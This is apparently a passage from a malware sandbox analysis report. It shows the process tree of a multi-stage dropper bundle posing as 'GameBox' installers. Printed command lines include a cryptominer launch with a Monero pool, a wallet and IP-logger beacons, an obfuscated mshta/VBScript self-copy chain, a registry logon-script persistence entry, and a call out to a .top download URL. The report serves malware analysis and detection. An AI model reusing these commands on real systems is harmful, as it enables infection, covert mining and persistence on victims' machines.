                                                                          • C:\Users\Admin\Documents\dXxfDt6Su5gh3HN3NNvdJvXJ.exe
                                                                            "C:\Users\Admin\Documents\dXxfDt6Su5gh3HN3NNvdJvXJ.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:744
                                                                            • C:\Users\Admin\Documents\dXxfDt6Su5gh3HN3NNvdJvXJ.exe
                                                                              "C:\Users\Admin\Documents\dXxfDt6Su5gh3HN3NNvdJvXJ.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5932
                                                                          • C:\Users\Admin\Documents\3MKtgvC4QoqfjHBg4WOfOaOd.exe
                                                                            "C:\Users\Admin\Documents\3MKtgvC4QoqfjHBg4WOfOaOd.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:2232
                                                                            • C:\Users\Admin\Documents\3MKtgvC4QoqfjHBg4WOfOaOd.exe
                                                                              C:\Users\Admin\Documents\3MKtgvC4QoqfjHBg4WOfOaOd.exe
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5096
                                                                          • C:\Users\Admin\Documents\LQdATnJkciohdiJW16JLSvhv.exe
                                                                            "C:\Users\Admin\Documents\LQdATnJkciohdiJW16JLSvhv.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:688
                                                                          • C:\Users\Admin\Documents\6yQGYIVQ4rTUmLLVcTC7832W.exe
                                                                            "C:\Users\Admin\Documents\6yQGYIVQ4rTUmLLVcTC7832W.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2216
                                                                            • C:\Users\Admin\AppData\Roaming\2161432.exe
                                                                              "C:\Users\Admin\AppData\Roaming\2161432.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4208
                                                                            • C:\Users\Admin\AppData\Roaming\3112841.exe
                                                                              "C:\Users\Admin\AppData\Roaming\3112841.exe"
                                                                              3⤵
                                                                                PID:4188
                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4204
                                                                              • C:\Users\Admin\AppData\Roaming\6070229.exe
                                                                                "C:\Users\Admin\AppData\Roaming\6070229.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3648
                                                                              • C:\Users\Admin\AppData\Roaming\7047428.exe
                                                                                "C:\Users\Admin\AppData\Roaming\7047428.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4440
                                                                            • C:\Users\Admin\Documents\slnn7PiYd2svBCJPbjei7hd6.exe
                                                                              "C:\Users\Admin\Documents\slnn7PiYd2svBCJPbjei7hd6.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1032
                                                                            • C:\Users\Admin\Documents\ZjlSJiMli9Rx94tBr8pOIpFE.exe
                                                                              "C:\Users\Admin\Documents\ZjlSJiMli9Rx94tBr8pOIpFE.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2256
                                                                              • C:\Users\Admin\Documents\ZjlSJiMli9Rx94tBr8pOIpFE.exe
                                                                                C:\Users\Admin\Documents\ZjlSJiMli9Rx94tBr8pOIpFE.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:5076
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 24
                                                                                  4⤵
                                                                                  • Program crash
                                                                                  PID:4404
                                                                            • C:\Users\Admin\Documents\yTUW_XYFbKp5MMXVumvVBRRq.exe
                                                                              "C:\Users\Admin\Documents\yTUW_XYFbKp5MMXVumvVBRRq.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:3812
                                                                              • C:\Users\Admin\Documents\yTUW_XYFbKp5MMXVumvVBRRq.exe
                                                                                "C:\Users\Admin\Documents\yTUW_XYFbKp5MMXVumvVBRRq.exe" -q
                                                                                3⤵
                                                                                  PID:4912
                                                                              • C:\Users\Admin\Documents\0TK3Km5GGezt7p3oPJ8mhxOd.exe
                                                                                "C:\Users\Admin\Documents\0TK3Km5GGezt7p3oPJ8mhxOd.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:4180
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-VAIVD.tmp\0TK3Km5GGezt7p3oPJ8mhxOd.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-VAIVD.tmp\0TK3Km5GGezt7p3oPJ8mhxOd.tmp" /SL5="$10280,138429,56832,C:\Users\Admin\Documents\0TK3Km5GGezt7p3oPJ8mhxOd.exe"
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:4500
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-V32OG.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-V32OG.tmp\Setup.exe" /Verysilent
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:4892
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5148
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5RHDR.tmp\Stats.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-5RHDR.tmp\Stats.tmp" /SL5="$20292,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:5404
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-NDTBC.tmp\builder.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-NDTBC.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                      5⤵
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3168
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5176
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 756
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:7152
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 792
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:6532
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 780
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:7660
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 820
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:7408
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 952
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:5448
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 992
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:7664
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1044
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:7604
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1336
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:4212
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1280
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    PID:7768
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5208
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-E7P89.tmp\Inlog.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-E7P89.tmp\Inlog.tmp" /SL5="$10396,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:5484
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RJ1CQ.tmp\Setup.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-RJ1CQ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                      5⤵
                                                                                        PID:5716
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-CGUFG.tmp\Setup.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-CGUFG.tmp\Setup.tmp" /SL5="$302E4,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-RJ1CQ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                          6⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:7484
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-D1UF1.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                            7⤵
                                                                                              PID:7840
                                                                                              • C:\Windows\SysWOW64\expand.exe
                                                                                                expand C:\Users\Admin\AppData\Local\Temp\is-D1UF1.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                8⤵
                                                                                                  PID:6784
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                7⤵
                                                                                                  PID:4988
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                    8⤵
                                                                                                      PID:10536
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                    7⤵
                                                                                                      PID:5424
                                                                                                    • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                      "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                      7⤵
                                                                                                        PID:7608
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-D1UF1.tmp\{app}\vdi_compiler.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-D1UF1.tmp\{app}\vdi_compiler"
                                                                                                        7⤵
                                                                                                          PID:6776
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-D1UF1.tmp\{app}\vdi_compiler.exe"
                                                                                                            8⤵
                                                                                                              PID:2440
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping localhost -n 4
                                                                                                                9⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:10256
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Enumerates connected drives
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:5292
                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586626 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                      4⤵
                                                                                                        PID:5376
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5452
                                                                                                      • C:\Users\Admin\AppData\Roaming\3347596.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\3347596.exe"
                                                                                                        4⤵
                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                        PID:200
                                                                                                      • C:\Users\Admin\AppData\Roaming\2649329.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\2649329.exe"
                                                                                                        4⤵
                                                                                                          PID:5992
                                                                                                        • C:\Users\Admin\AppData\Roaming\2457344.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\2457344.exe"
                                                                                                          4⤵
                                                                                                            PID:4360
                                                                                                          • C:\Users\Admin\AppData\Roaming\7307973.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\7307973.exe"
                                                                                                            4⤵
                                                                                                              PID:5464
                                                                                                            • C:\Users\Admin\AppData\Roaming\2597123.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\2597123.exe"
                                                                                                              4⤵
                                                                                                                PID:6160
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5736
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-58NFE.tmp\MediaBurner2.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-58NFE.tmp\MediaBurner2.tmp" /SL5="$1045A,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:6024
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-MUK4N.tmp\ultradumnibour.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-MUK4N.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                  5⤵
                                                                                                                  • Drops file in Drivers directory
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:5536
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\09-45f79-18c-216a1-b12a8b28ccfe9\Xydaejobila.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\09-45f79-18c-216a1-b12a8b28ccfe9\Xydaejobila.exe"
                                                                                                                    6⤵
                                                                                                                      PID:7752
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                        dw20.exe -x -s 1348
                                                                                                                        7⤵
                                                                                                                          PID:10896
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8b-6ec5c-2a6-095a8-a33125ab985ac\Naetodaxaezhi.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\8b-6ec5c-2a6-095a8-a33125ab985ac\Naetodaxaezhi.exe"
                                                                                                                        6⤵
                                                                                                                          PID:6672
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izzddxkv.5qr\GcleanerEU.exe /eufive & exit
                                                                                                                            7⤵
                                                                                                                              PID:7612
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                8⤵
                                                                                                                                  PID:4272
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\izzddxkv.5qr\GcleanerEU.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\izzddxkv.5qr\GcleanerEU.exe /eufive
                                                                                                                                  8⤵
                                                                                                                                    PID:8324
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\izzddxkv.5qr\GcleanerEU.exe" & exit
                                                                                                                                      9⤵
                                                                                                                                        PID:9492
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im "GcleanerEU.exe" /f
                                                                                                                                          10⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:8384
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\srvfzjsj.gnu\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                    7⤵
                                                                                                                                      PID:8788
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\srvfzjsj.gnu\installer.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\srvfzjsj.gnu\installer.exe /qn CAMPAIGN="654"
                                                                                                                                        8⤵
                                                                                                                                          PID:5532
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1xclcp3w.q1s\anyname.exe & exit
                                                                                                                                        7⤵
                                                                                                                                          PID:1892
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1xclcp3w.q1s\anyname.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1xclcp3w.q1s\anyname.exe
                                                                                                                                            8⤵
                                                                                                                                              PID:5060
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1xclcp3w.q1s\anyname.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1xclcp3w.q1s\anyname.exe" -q
                                                                                                                                                9⤵
                                                                                                                                                  PID:4580
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ini3jfwo.wzd\gcleaner.exe /mixfive & exit
                                                                                                                                              7⤵
                                                                                                                                                PID:4988
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ini3jfwo.wzd\gcleaner.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ini3jfwo.wzd\gcleaner.exe /mixfive
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6792
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ini3jfwo.wzd\gcleaner.exe" & exit
                                                                                                                                                      9⤵
                                                                                                                                                        PID:10000
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          10⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4912
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im "gcleaner.exe" /f
                                                                                                                                                          10⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:6472
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yuqeqcbr.xr4\autosubplayer.exe /S & exit
                                                                                                                                                    7⤵
                                                                                                                                                      PID:9152
                                                                                                                                                  • C:\Program Files\Microsoft Office\CHZUJUMUFV\ultramediaburner.exe
                                                                                                                                                    "C:\Program Files\Microsoft Office\CHZUJUMUFV\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                    6⤵
                                                                                                                                                      PID:7284
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks computer location settings
                                                                                                                                                PID:5728
                                                                                                                                                • C:\Users\Admin\Documents\gcnzY0aVAZR7nriILLaunSg_.exe
                                                                                                                                                  "C:\Users\Admin\Documents\gcnzY0aVAZR7nriILLaunSg_.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:7124
                                                                                                                                                  • C:\Users\Admin\Documents\gcnzY0aVAZR7nriILLaunSg_.exe
                                                                                                                                                    C:\Users\Admin\Documents\gcnzY0aVAZR7nriILLaunSg_.exe
                                                                                                                                                    5⤵
                                                                                                                                                      PID:7364
                                                                                                                                                  • C:\Users\Admin\Documents\fTftY9ua9F2x4Jo70t9G7EUo.exe
                                                                                                                                                    "C:\Users\Admin\Documents\fTftY9ua9F2x4Jo70t9G7EUo.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:856
                                                                                                                                                    • C:\Users\Admin\Documents\FJPPEZkYcLuJKMrqZmCIQX0X.exe
                                                                                                                                                      "C:\Users\Admin\Documents\FJPPEZkYcLuJKMrqZmCIQX0X.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:3460
                                                                                                                                                    • C:\Users\Admin\Documents\aM34Xxk_1JCW1FcjZwXaakGb.exe
                                                                                                                                                      "C:\Users\Admin\Documents\aM34Xxk_1JCW1FcjZwXaakGb.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:7160
                                                                                                                                                    • C:\Users\Admin\Documents\kt8c4OhtVStzk1rRltol2CTF.exe
                                                                                                                                                      "C:\Users\Admin\Documents\kt8c4OhtVStzk1rRltol2CTF.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5412
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\kt8c4OhtVStzk1rRltol2CTF.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\kt8c4OhtVStzk1rRltol2CTF.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                          5⤵
                                                                                                                                                            PID:7252
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\kt8c4OhtVStzk1rRltol2CTF.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\kt8c4OhtVStzk1rRltol2CTF.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                              6⤵
                                                                                                                                                                PID:8128
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                  WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4848
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:7660
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5184
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:8172
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill -IM "kt8c4OhtVStzk1rRltol2CTF.exe" -f
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:2076
                                                                                                                                                              • C:\Users\Admin\Documents\09oGtp8vkGk4QPnJWz7EKmBo.exe
                                                                                                                                                                "C:\Users\Admin\Documents\09oGtp8vkGk4QPnJWz7EKmBo.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:7144
                                                                                                                                                              • C:\Users\Admin\Documents\pIY7OWV3huUoZysJTsJlza7L.exe
                                                                                                                                                                "C:\Users\Admin\Documents\pIY7OWV3huUoZysJTsJlza7L.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4524
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 484
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:7928
                                                                                                                                                                • C:\Users\Admin\Documents\mGu6WM5osYBlK0ooucTAWVR0.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\mGu6WM5osYBlK0ooucTAWVR0.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5328
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-SAJMA.tmp\mGu6WM5osYBlK0ooucTAWVR0.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-SAJMA.tmp\mGu6WM5osYBlK0ooucTAWVR0.tmp" /SL5="$602B8,138429,56832,C:\Users\Admin\Documents\mGu6WM5osYBlK0ooucTAWVR0.exe"
                                                                                                                                                                      5⤵
